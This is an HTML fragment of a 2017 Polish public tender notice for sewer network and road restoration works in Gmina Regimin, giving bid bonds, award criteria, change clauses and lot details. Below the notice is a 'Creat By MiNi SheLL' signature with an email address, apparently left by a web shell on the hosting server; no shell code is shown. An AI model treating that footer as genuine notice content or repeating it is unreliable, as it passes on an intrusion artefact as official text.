Wadium (zadanie 1): 70 000 zł	słownie: siedemdziesiąt tysięcy złotych
Wadium (zadanie 2): 4 000 zł	słownie cztery tysiące złotych

W zależności, na które zadanie Wykonawca składa ofertę wpłaca ustalone powyżej wadium.
Jeżeli na dwa zadania wpłaca wadium w/w dla całości przedmiotu zamówienia.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>NAJNIŻSZA CENA</td><td>60</td></tr><tr><td>GWARANCJA</td><td>30</td></tr><tr><td>DOŚWIADCZENIE ZAWODOWE KIEROWNIKA BUDOWY</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Poza przypadkami określonymi w niniejszej umowie zmiany będą mogły nastąpić w następujących przypadkach:
      a) wystąpienia istotnych wad dokumentacji projektowej skutkujących koniecznością dokonania         
          poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację   
    określonego rodzaju robót mających wpływ na zmianę terminu realizacji  zmianie ulegnie 
    odpowiednio termin realizacji zamówienia.
      b) zaistnienia okoliczności po stronie zamawiającego, w szczególności spowodowanych
          sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź  
    okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy    
    zmianie mogą ulec termin realizacji umowy oraz terminy wynikające z harmonogramu albo
      c) gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność     
    prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności,   
    skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją     
    istotnych warunków zamówienia  zamawiający dopuszcza możliwość zmiany umowy, w  
    szczególności terminu realizacji zamówienia i jego zakresu.
	d) jeżeli w trakcie robót ziemnych nastąpi kolizja z zabytkami archeologicznymi, gdzie trzeba 
     będzie wstrzymać roboty budowlane aby móc przeprowadzić stosowne badania archeologiczne  
     zmianie ulegnie odpowiednio termin realizacji zamówienia
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 26/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              WYKONAWCA SKŁADA JEDNĄ OFERTĘ Z ZACHOWANIEM FORMY PISEMNEJ, NAPISANEJ W JĘZYKU POLSKIM<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>ZADANIE 1: BUDOWA KANALIZACJI SANITARNEJ NA TERENIE GMINY REGIMIN - IV ETAP  TARGONIE  LEKOWO (SIEĆ KANALIZACJI + PRZYKANALIKI)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>- Sieć śr. DN200 i DN160 mm - Roboty ziemne i zabezpieczające.
- Sieć śr. DN200 i DN160 mm - Roboty technologiczne sieci.
- Odwodnienie wykopów pod sieć i przepompownie.
- Przepompownie ścieków roboty ziemnie i zabezpieczające.
- Przepompownie ścieków 
Zakres i wielkość zamówienia przedstawione zostały w projekcie budowlanym i przedmiarze robót   (format PDF) zamieszczonych na naszej stronie (www.regimin.pl), projekt budowlany jest również do wglądu w siedzibie zamawiającego.
- Przyłącze elektryczne do przepompowni ścieków
- przykanaliki kanalizacji sanitarnej DN160 do pierwszej studni  roboty ziemne
- przykanaliki kanalizacji sanitarnej DN160 do pierwszej studni  roboty technologiczne
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45200000-9,
                    45231300-8,
                    45111300-8,
                    45111200-0,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/10/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>NAJNIŻSZA CENA</td><td>60</td></tr><tr><td>GARANCJA</td><td>30</td></tr><tr><td>DOŚWIADCZENIE ZAWODOWE KIEROWNIKA BUDOWY</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>ZADANIE 2: BUDOWA KANALIZACJI SANITARNEJ NA TERENIE GMINY REGIMIN - IV ETAP  TARGONIE  LEKOWO (ODTWORZENIE NAWIERZCHNI Z MIESZANEK MINERALNO-BITUMICZNYCH ASFALTOWYCH)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>- Odtworzenie nawierzchni - sieć DN200
- Odtworzenie nawierzchni - sieć DN160.
Zakres i wielkość zamówienia przedstawione zostały w projekcie budowlanym i przedmiarze robót   (format PDF) zamieszczonych na naszej stronie (www.regimin.pl), projekt budowlany jest również do wglądu w siedzibie zamawiającego.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45233142-6,
                    45233220-7,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>NAJNIŻSZA CENA</td><td>60</td></tr><tr><td>GWARANCJA</td><td>30</td></tr><tr><td>DOŚWIADCZENIE ZAWODOWE KIEROWNIKA BUDOWY</td><td>10</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com